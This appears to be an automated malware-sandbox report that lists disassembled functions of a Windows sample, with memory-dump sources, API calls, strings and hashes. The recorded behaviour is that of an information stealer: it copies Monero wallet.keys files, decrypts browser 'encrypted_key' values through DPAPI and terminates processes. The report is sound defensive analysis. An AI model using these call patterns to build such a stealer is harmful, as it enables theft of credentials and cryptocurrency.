                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 711bf826c0b73db3860c267651f660d8df2dbe79ad06915c9036f7a9da5e1dca
                            • Instruction ID: 8e3ad3e751b81cc111d8381cfa969b86134b0951d5747bc6f168cd4a02d29986
                            • Opcode Fuzzy Hash: 711bf826c0b73db3860c267651f660d8df2dbe79ad06915c9036f7a9da5e1dca
                            • Instruction Fuzzy Hash: 46E1BC72E101489ECB15EBA5DDA2EEE7339AF29300F518559F11676093EF307A48CB72
                            Function 000DD500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000E8CF0: GetSystemTime.KERNEL32(000F0E1B,00D4A870,000F05B6,?,?,000D13F9,?,0000001A,000F0E1B,00000000,?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000E8D16
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000DD581
                            • lstrlen.KERNEL32(00000000), ref: 000DD798
                            • lstrlen.KERNEL32(00000000), ref: 000DD7AC
                            • DeleteFileA.KERNEL32(00000000), ref: 000DD82B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: aa1253d8da45ad44111624f06bbce17d8e939203037090ee22bf1719a05434f6
                            • Instruction ID: 2e41c44c5976bf4e0e1d55b1acb7bd8c59783eccab45157ab7975a257834db16
                            • Opcode Fuzzy Hash: aa1253d8da45ad44111624f06bbce17d8e939203037090ee22bf1719a05434f6
                            • Instruction Fuzzy Hash: DA91DE72E101489FCB15EBA5DCA2DEE7339AF69300F518569F11676193EF307A08CB62
                            Function 000DD880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000E8CF0: GetSystemTime.KERNEL32(000F0E1B,00D4A870,000F05B6,?,?,000D13F9,?,0000001A,000F0E1B,00000000,?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000E8D16
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000DD901
                            • lstrlen.KERNEL32(00000000), ref: 000DDA9F
                            • lstrlen.KERNEL32(00000000), ref: 000DDAB3
                            • DeleteFileA.KERNEL32(00000000), ref: 000DDB32
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 769c0e9308beb295964d62ad02c139cd7d86559ce56841f53bfb3a18535a4615
                            • Instruction ID: a6fc2860e413f21d2f43767ca38dd2202b9c5629daf0c1dd50609006613a3b92
                            • Opcode Fuzzy Hash: 769c0e9308beb295964d62ad02c139cd7d86559ce56841f53bfb3a18535a4615
                            • Instruction Fuzzy Hash: 5081FB72E101489FCB04EBA5DCA6DEE7339AF6A300F514569F10676193EF347A08CB62
                            Function 0014FED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AdjustPointer
                            • String ID:
                            • API String ID: 1740715915-0
                            • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                            • Instruction ID: cae17b0ca7811790bd753730445a8c6e9d65830b675b6eeed7eced86d44bbad6
                            • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                            • Instruction Fuzzy Hash: 0051C072900206EFEB2A8F94C851BBA77A4FF15311F24453DFC158A6A1E731ED4ADB90
                            Function 000DA560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                            Download Yara Rule
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 000DA664
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrcpy
                            • String ID: @$v10$v20
                            • API String ID: 2746078483-278772428
                            • Opcode ID: 4d9c94d7e454f32f6185b67f728db170432acebe574398591ccd836b62d3c682
                            • Instruction ID: 19f5684fceac267d9e93825fc532bf1b4d52b20719046bb2b3f547376003b6a5
                            • Opcode Fuzzy Hash: 4d9c94d7e454f32f6185b67f728db170432acebe574398591ccd836b62d3c682
                            • Instruction Fuzzy Hash: 42513C70B1024CEFDB24DFA4CD96BED7776AF45304F008118EA0A6F696DB706A05CB62
                            Function 000DF5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                              • Part of subcall function 000DA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000DA13C
                              • Part of subcall function 000DA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000DA161
                              • Part of subcall function 000DA110: LocalAlloc.KERNEL32(00000040,?), ref: 000DA181
                              • Part of subcall function 000DA110: ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000DA1AA
                              • Part of subcall function 000DA110: LocalFree.KERNEL32(000D148F), ref: 000DA1E0
                              • Part of subcall function 000DA110: CloseHandle.KERNEL32(000000FF), ref: 000DA1EA
                              • Part of subcall function 000E8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000E8FE2
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,000F1678,000F0D93), ref: 000DF64C
                            • lstrlen.KERNEL32(00000000), ref: 000DF66B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 998311485-3310892237
                            • Opcode ID: fb39da2317c09763cc038aab055d70f2516e6d653d241ed046b6443c2cb36a41
                            • Instruction ID: 094ba0a3db90dcef070d517bd7bb2b881f550fbc2f6f38f4eb07e6995871ea05
                            • Opcode Fuzzy Hash: fb39da2317c09763cc038aab055d70f2516e6d653d241ed046b6443c2cb36a41
                            • Instruction Fuzzy Hash: 0C511972E002489ECB14FBA1DDA29FD7379AF59300F418568F51676193EF346A08CB62
                            Function 000E37B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 69c4cc29a641c8ae9931ae991a413fc71b86f43f03f32875bc2c9e873dcf889e
                            • Instruction ID: 733b83a0e1b39db6ddf870557127dc95896e0a7593c8b00a1af157f521eea435
                            • Opcode Fuzzy Hash: 69c4cc29a641c8ae9931ae991a413fc71b86f43f03f32875bc2c9e873dcf889e
                            • Instruction Fuzzy Hash: C6416171E002499FCB04EFA5DD55AFEB778AF58304F008028F51677192EB70AA04CFA2
                            Function 000DA430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000DA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000DA13C
                              • Part of subcall function 000DA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000DA161
                              • Part of subcall function 000DA110: LocalAlloc.KERNEL32(00000040,?), ref: 000DA181
                              • Part of subcall function 000DA110: ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000DA1AA
                              • Part of subcall function 000DA110: LocalFree.KERNEL32(000D148F), ref: 000DA1E0
                              • Part of subcall function 000DA110: CloseHandle.KERNEL32(000000FF), ref: 000DA1EA
                              • Part of subcall function 000E8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000E8FE2
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 000DA489
                              • Part of subcall function 000DA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 000DA23F
                              • Part of subcall function 000DA210: LocalAlloc.KERNEL32(00000040,?,?,?,000D4F3E,00000000,?), ref: 000DA251
                              • Part of subcall function 000DA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 000DA27A
                              • Part of subcall function 000DA210: LocalFree.KERNEL32(?,?,?,?,000D4F3E,00000000,?), ref: 000DA28F
                              • Part of subcall function 000DA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 000DA2D4
                              • Part of subcall function 000DA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 000DA2F3
                              • Part of subcall function 000DA2B0: LocalFree.KERNEL32(?), ref: 000DA323
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: 27d1b36ea51c462aa42d4923685ec3bb19c93dc2a1989b19d1436aa84923d882
                            • Instruction ID: 8487c54cd56d1cefc6bbee3645c36a252c94cb78591efde0e88e56574c59b104
                            • Opcode Fuzzy Hash: 27d1b36ea51c462aa42d4923685ec3bb19c93dc2a1989b19d1436aa84923d882
                            • Instruction Fuzzy Hash: F03143B6E0060DABCF04DFD4EC45AEFB7B8AF59304F044519E905A7246E7319A04CBB2
                            Function 000E9660 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 000E967B
                              • Part of subcall function 000E8EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,000E96AE,00000000), ref: 000E8EEB
                              • Part of subcall function 000E8EE0: RtlAllocateHeap.NTDLL(00000000), ref: 000E8EF2
                              • Part of subcall function 000E8EE0: wsprintfW.USER32 ref: 000E8F08
                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 000E973B
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 000E9759
                            • CloseHandle.KERNEL32(00000000), ref: 000E9766
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                            • String ID:
                            • API String ID: 3729781310-0
                            • Opcode ID: 1b6e03728731899f0e34010c84202182630c06f8144715f2c4a6e714143fafcb
                            • Instruction ID: 3e6e1c5aa7a27bae354fb16aabbd534a79b95dcdfa71fb21c7d46f2c2d8d3b04
                            • Opcode Fuzzy Hash: 1b6e03728731899f0e34010c84202182630c06f8144715f2c4a6e714143fafcb
                            • Instruction Fuzzy Hash: 55315875E04248EFDB14DFE1CD89BEDB7B8BB49700F104458F606AB285EB74AA48CB51
                            Function 000E8810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                            Download Yara Rule
